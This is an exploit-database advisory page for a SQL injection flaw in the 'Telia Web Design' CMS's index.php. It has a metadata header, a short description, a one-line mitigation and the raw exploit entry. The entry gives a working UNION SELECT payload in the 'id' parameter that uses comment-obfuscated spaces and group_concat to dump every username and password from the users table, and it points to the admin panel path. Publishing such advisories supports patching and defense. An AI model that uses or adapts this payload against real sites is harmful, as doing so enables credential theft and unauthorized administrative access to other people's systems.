Telia Web Design (index.php) SQL Injection Vulnerability

vendor:

Web Design

by:

CoBRa_21

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Web Design

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Telia Web Design (index.php) SQL Injection Vulnerability

An attacker can exploit a SQL injection vulnerability in Telia Web Design (index.php) to gain access to the admin panel. The attacker can send a malicious HTTP request to the vulnerable application, which contains a specially crafted SQL query in the 'id' parameter. This query will return the username and password of all users in the database, allowing the attacker to gain access to the admin panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

Telia Web Design (index.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.telia.co.gr/

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/index.php?module=content&action=article&id=-80/**/union/**/select/**/group_concat(username,0x3a,password),2/**/from/**/users


Admin Panel

http://localhost/[path]/admin
-------------------------------------------------------------------------------------------